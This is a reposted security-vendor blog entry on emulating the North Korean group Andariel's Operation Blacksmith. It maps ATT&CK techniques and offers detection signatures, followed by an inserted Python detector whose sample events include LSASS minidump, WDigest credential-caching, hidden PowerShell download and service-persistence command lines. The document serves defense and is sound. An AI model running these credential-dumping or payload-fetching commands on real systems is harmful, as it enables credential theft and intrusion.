Emulating the Politically Motivated North Korean Adversary Andariel – Part 2
2024-8-1 01:28:51 Author: securityboulevard.com

On December 11, 2023, Cisco Talos reported the discovery of an activity led by Andariel, a North Korean state-sponsored adversary known to be a subgroup of the notorious Lazarus group, which employed three new DLang-based malware families. This activity consists of continued opportunistic targeting of enterprises that publicly host and expose their vulnerable infrastructure to n-day vulnerability exploitation. During the same activity, Andariel was observed targeting manufacturing, agricultural, and physical security companies.

Operation Blacksmith involved the exploitation of CVE-2021-44228, also known as Log4Shell, and the use of a previously unknown DLang-based Remote Access Trojan (RAT) named NineRAT, which employs Telegram as its C2 channel. NineRAT was initially built around May 2022 and was first used as early as March 2023, almost a year later, against a South American agricultural organization. A common tool in this activity was “HazyLoad”, a custom-made proxy tool previously observed targeting a European firm and an American subsidiary of a South Korean physical security and surveillance company as early as May 2023.

Andariel, also known as Onyx Sleet, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa, is a North Korean state-sponsored adversary that has been active since at least 2009. The adversary, a subgroup of the notorious Lazarus group, is suspected to be operating in support of the DPRK’s RGB 3rd Bureau.

Following a significant reorganization of DPRK’s government structure in 2015, Andariel has been focused on collecting intelligence on government and military entities. Its primary targets include defense, aerospace, nuclear, and engineering entities to acquire sensitive and classified technical information and intellectual property to advance the regime’s military and nuclear programs and ambitions.

AttackIQ has previously released an attack graph in response to CSA AA24-207A, which emulates the post-compromise Tactics, Techniques and Procedures (TTPs) exhibited by Andariel during its latest activities. For further coverage and details, we suggest the reader visit the blog published on July 26, 2024.

In addition, in December 2022, AttackIQ released a content bundle that emulates several activities led by Andariel against multiple entities located in Asia, predominantly in South Korea, through the use of downloaders, backdoors and custom ransomware.

AttackIQ has released a new attack graph that emulates the behaviors exhibited by the North Korean adversary Andariel during Operation Blacksmith to help customers validate their security controls and their ability to defend against this threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against an actor with both financial and political motivations.
  • Assess their security posture against a threat actor who is not afraid to commit to destruction actions.
  • Continuously validate detection and prevention pipelines against another subset of North Korean actors who share successful techniques with other regional threat groups.

Andariel – 2023-12 – Operation Blacksmith

Discovery – Initial System Reconnaissance

This stage begins immediately after the successful exploitation of CVE-2021-44228, also known as Log4Shell, on publicly facing VMWare Horizon servers. This leads to an initial reconnaissance phase which focuses on obtaining system information such as users, active processes, files and directories and Remote Desktop Protocol (RDP) session reconnection information.

This stage concludes with the query and subsequent modification of a registry key that enables authentication through WDigest.

System Information Discovery (T1082): This scenario executes the native systeminfo command to retrieve all of the Windows system information.

System Owner/User Discovery (T1033): This scenario executes the native whoami command to retrieve details of the running user account.

Account Discovery (T1087): This scenario uses the native net user command to enumerate available accounts on the system.

Process Discovery (T1057): This scenario uses the Windows built-in tasklist command to discover running processes, and the results are saved to a file in a temporary location.

File and Directory Discovery (T1083): This scenario uses the native dir command to find files of interest and output to a temporary file.

Log Enumeration (T1654): This scenario searches the Windows Event Log for RDP Session Reconnection Information using the wevtutil utility.

System Network Connections Discovery (T1049): This scenario uses the native Windows command line tool netstat to collect active connections and any listening services running on the host.

Query Registry (T1012): This scenario queries the HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ registry key.

Impair Defenses (T1562): This scenario enables WDigest authentication by modifying the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential registry key.

Credential Access & Privilege Escalation – Acquiring Credentials and Privileges

Once the initial reconnaissance has been completed, HazyLoad, a proxy tool used to establish direct access to the infected system, is deployed. Then, an account with the name krtbgt will be created and added to the local Administrators group.

Finally, credentials will be obtained through the hacktool known as Mimikatz and the dumping of the Local Security Authority Subsystem Service (LSASS) process.

Ingress Tool Transfer (T1105): This scenario downloads the sample to memory and, in an independent scenario, saves it to disk, to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Create Account: Local Account (T1136.001): This scenario creates a new account with the name krtbgt using the net user command.

Account Manipulation (T1098): This scenario adds a local user to the local Administrators group using the net localgroup command.

Permission Groups Discovery (T1069): This scenario will enumerate a local permission group using the net localgroup administrators command.

OS Credential Dumping (T1003): This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes for Windows accounts.

OS Credential Dumping: LSASS Memory (T1003.001): This scenario dumps the LSASS memory to disk by creating a minidump of the lsass process. This process is used for enforcing security policy on the system and contains many privileged tokens and accounts that are targeted by threat actors.

Execution – Payload Staging and Deployment

This stage, which begins after the credential dumping phase is completed, focuses on the deployment of the DLang-based Remote Access Trojan (RAT) named NineRAT.

NineRAT deployment consists of three components, the first of which is a dropper binary that contains the other two components embedded in it. The second component, an instrumentor, is used to deploy the third component which is the NineRAT malware.

Finally, persistence is acquired through the creation of a new service named Aarsvc_XXXXXX.

Windows Service (T1543.003): This scenario uses the native sc command line tool to create a new service named Aarsvc_XXXXXX.

Discovery – System Fingerprinting

This stage focuses on the system fingerprinting performed by NineRAT. During this stage, it will seek to obtain detailed system information such as the operating system version and architecture, the username, the security software installed, the network configuration, the connections established, and available remote systems in the domain.

System Information Discovery (T1082): This scenario executes the native ver command to discover the Windows version.

Windows Management Instrumentation (WMI) (T1047): This scenario uses wmic os get osarchitecture to discover the current operating system architecture.

Security Software Discovery (T1518.001): This scenario uses the native Microsoft Windows Management Instrumentation Command-line (WMIC) utility to determine which software has been installed as an AntiVirusProduct class.

System Network Configuration Discovery (T1016): This scenario collects the network configuration of the asset using the ipconfig /all command.

Remote System Discovery (T1018): This scenario executes the net group "Domain Computers" /domain command to gather additional hosts available to the infected asset.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to try and detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

2. OS Credential Dumping: LSASS Memory (T1003.001):

Adversaries may attempt to extract user and credential information from the Local Security Authority Subsystem Service (LSASS) process.

2a. Detection

Search for executions of comsvcs that attempt to access the LSASS process.

Process Name == (comsvcs)
Command Line CONTAINS ("lsass")

2b. Mitigation

MITRE ATT&CK recommends the following mitigations:

3. Windows Service (T1543.003):

Actors can create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.

3a. Detection

The following rules can help identify when that persistence mechanism is being set.

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ("sc" AND "create" AND "start= \"auto\"")
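The three signatures above (1a, 2a and 3a) and the WDigest UseLogonCredential change from the Discovery stage, implemented as matching logic over a handful of constructed process-creation events. This is an added example, not code from the original post or from the AttackIQ platform; the event ids, file paths, PID and example.invalid URL are placeholders, and the comsvcs rule is checked against the command line because comsvcs.dll is loaded by rundll32.exe rather than running as a process of its own.

```python
import re

# Constructed sample events in Sysmon Event ID 1 / Windows 4688 style (not from the original
# post). Events 1-4 carry the tokens each signature looks for; 5 and 6 are benign look-alikes.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -WindowStyle Hidden -c "(IWR http://example.invalid/h.bin).DownloadData"'},
    {"id": 2, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe comsvcs.dll,MiniDump 624 C:\Temp\lsass.dmp full"},
    {"id": 3, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c sc create Aarsvc_123456 binPath= "C:\ProgramData\svc.exe" start= "auto"'},
    {"id": 4, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
                r" /v UseLogonCredential /t REG_DWORD /d 1 /f"},
    {"id": 5, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c sc query Aarsvc_123456"},
    {"id": 6, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -c "IWR https://example.invalid/index.html"'},
]

# Each rule: ATT&CK id, description, allowed image names, and regexes that must ALL match the
# lower-cased command line. Word boundaries stop "sc" from firing on words such as "schtasks".
RULES = [
    ("T1105", "PowerShell download to memory (signature 1a)",
     {"cmd.exe", "powershell.exe"}, [r"\b(iwr|invoke-webrequest)\b", r"downloaddata", r"hidden"]),
    ("T1003.001", "LSASS minidump through comsvcs.dll (signature 2a)",
     {"rundll32.exe", "cmd.exe", "powershell.exe"}, [r"comsvcs", r"lsass"]),
    ("T1543.003", "Service created with automatic start (signature 3a)",
     {"cmd.exe", "powershell.exe", "sc.exe"}, [r"\bsc(\.exe)?\b", r"\bcreate\b", r'start=\s*"?auto"?']),
    ("T1562", "WDigest UseLogonCredential set to 1 (Discovery stage)",
     {"cmd.exe", "powershell.exe", "reg.exe"},
     [r"\breg(\.exe)?\s+add\b", r"wdigest", r"uselogoncredential", r"/d\s+0*1\b"]),
]

def image_name(path: str) -> str:
    """Basename of the process image, lower-cased for comparison with the rule's image set."""
    return path.rsplit("\\", 1)[-1].lower()

def match(event: dict) -> list:
    """Return the ATT&CK ids of every rule this single event satisfies."""
    name, cmd = image_name(event["image"]), event["cmdline"].lower()
    return [tid for tid, _desc, images, pats in RULES
            if name in images and all(re.search(p, cmd) for p in pats)]

def scan(events: list) -> dict:
    """Map event id -> matched ATT&CK ids, keeping only events that triggered at least one rule."""
    return {e["id"]: hits for e in events if (hits := match(e))}

if __name__ == "__main__":
    for eid, hits in scan(EVENTS).items():
        print(f"event {eid}: {', '.join(hits)}")
```

Events 5 and 6 produce no hit: a service query and a plain web request share tokens with the signatures but lack the create/autostart and DownloadData/Hidden combinations that the rules require.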

3b. Mitigation

MITRE ATT&CK has the following mitigation recommendations:

Wrap-up

In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the activities carried out by the Andariel adversary. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.


Source: https://securityboulevard.com/2024/07/emulating-the-politically-motivated-north-korean-adversary-andariel-part-2/